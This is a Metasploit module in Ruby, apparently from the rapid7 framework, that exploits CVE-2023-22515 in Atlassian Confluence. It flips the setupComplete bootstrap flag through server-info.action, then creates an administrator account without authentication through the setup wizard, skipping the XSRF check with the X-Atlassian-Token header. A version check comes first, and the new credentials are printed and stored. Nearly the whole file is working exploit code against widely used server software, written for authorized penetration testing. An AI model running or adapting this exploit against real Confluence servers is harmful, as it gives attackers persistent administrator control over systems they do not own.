GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
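class MetasploitModule < Msf::Auxiliary
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  # Confluence version ranges (inclusive at both ends) that this module treats
  # as affected by CVE-2023-22515. Anything outside every range is reported as
  # Safe by #check.
  VULNERABLE_RANGES = [
    ['8.0.0', '8.3.2'],
    ['8.4.0', '8.4.2'],
    ['8.5.0', '8.5.1']
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',
        'Description' => %q{
          This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.
          A specially crafted request can be used to create a new admin account without authentication on the target Atlassian server.
          The module does not remove the account it creates; clean it up on the target after the engagement.
        },
        'Author' => [
          'Unknown', # exploited in the wild
          'Emir Polat' # metasploit module
        ],
        'References' => [
          ['CVE', '2023-22515'],
          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],
          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']
        ],
        'DisclosureDate' => '2023-10-04',
        'DefaultOptions' => {
          'RPORT' => 8090 # Confluence's stock HTTP listener port
        },
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # A persistent admin account is added and the setup state is toggled.
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      # \A and \z anchor the whole value; ^ and $ only anchor lines and would
      # accept a value with an embedded newline.
      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /\A[a-z._@]+\z/),
      # The account outlives the module run, so the generated default is made
      # longer and drawn from a larger alphabet than a short alpha-only string.
      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alphanumeric(12)]),
      OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
    ])
  end

  # Reads the Confluence version from the "poweredby" footer of the login page
  # and compares it against VULNERABLE_RANGES.
  #
  # @return [Exploit::CheckCode] Unknown when no response or no version string
  #   could be obtained, Appears for a version inside one of the ranges,
  #   Safe for any other version.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/login.action')
    )
    return Exploit::CheckCode::Unknown unless res
    # A non-200 (redirect, 404 for a wrong TARGETURI, ...) means the version
    # could not be determined, not that the target is patched.
    return Exploit::CheckCode::Unknown("Unexpected response code #{res.code} from login.action") unless res.code == 200

    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
    version_match = poweredby&.match(/Confluence (\d+(\.\d+)*)/)
    return Exploit::CheckCode::Unknown('Could not read the Confluence version from the login page') unless version_match

    confluence_version = Rex::Version.new(version_match[1])
    vprint_status("Detected Confluence version: #{confluence_version}")

    affected = VULNERABLE_RANGES.any? do |low, high|
      confluence_version.between?(Rex::Version.new(low), Rex::Version.new(high))
    end
    return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}") if affected

    Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")
  end

  # Re-opens the setup wizard, submits a new administrator through it, then
  # completes setup again and records the resulting credential.
  #
  # @raise [Msf::Auxiliary::Failed] via fail_with when server-info.action does
  #   not answer 200/302 or when the administrator could not be created.
  def run
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/server-info.action'),
      'vars_get' => {
        # Flipping this bootstrap flag is the bypass: the instance behaves as
        # if first-run setup had not been completed.
        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
      }
    )
    unless res && [200, 302].include?(res.code)
      # The original message blamed a completed setup; the only thing known here
      # is that the endpoint did not answer as expected.
      fail_with(Msf::Exploit::Failure::UnexpectedReply, "Unexpected response from server-info.action (#{res ? res.code : 'no response'})")
    end

    print_good('Found server-info.action! Trying to ignore setup.')

    created_user = create_admin_user

    # Sent even when user creation failed, so the target is not left with the
    # setup wizard open — presumably the reason for the original ordering; confirm
    # against a live instance before changing it.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),
      'headers' => {
        # Header Atlassian products honour to skip the XSRF token check.
        'X-Atlassian-Token' => 'no-check'
      }
    )

    fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user

    print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200

    create_credential({
      workspace_id: myworkspace_id,
      origin_type: :service,
      module_fullname: fullname,
      username: datastore['NEW_USERNAME'],
      private_type: :password,
      private_data: datastore['NEW_PASSWORD'],
      service_name: 'Atlassian Confluence',
      address: rhost,
      port: rport,
      protocol: 'tcp',
      status: Metasploit::Model::Login::Status::UNTRIED
    })

    print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")
    # full_uri picks the right scheme for SSL, the single host being worked on
    # rather than the RHOSTS list, and joins TARGETURI without relying on a
    # trailing slash.
    print_good("Now you can login as administrator from: #{full_uri(normalize_uri(target_uri.path, 'login.action'))}")
  end

  # Submits the setup wizard's administrator form with the NEW_* options.
  #
  # @return [Boolean] true when the server answered 302, which the module
  #   takes as the account having been accepted; false otherwise (including
  #   no response).
  def create_admin_user
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),
      'headers' => {
        # Header Atlassian products honour to skip the XSRF token check.
        'X-Atlassian-Token' => 'no-check'
      },
      'vars_post' => {
        'username' => datastore['NEW_USERNAME'],
        'fullName' => 'New Admin',
        'email' => datastore['NEW_EMAIL'],
        'password' => datastore['NEW_PASSWORD'],
        'confirm' => datastore['NEW_PASSWORD'],
        'setup-next-button' => 'Next'
      }
    )
    res&.code == 302
  end
end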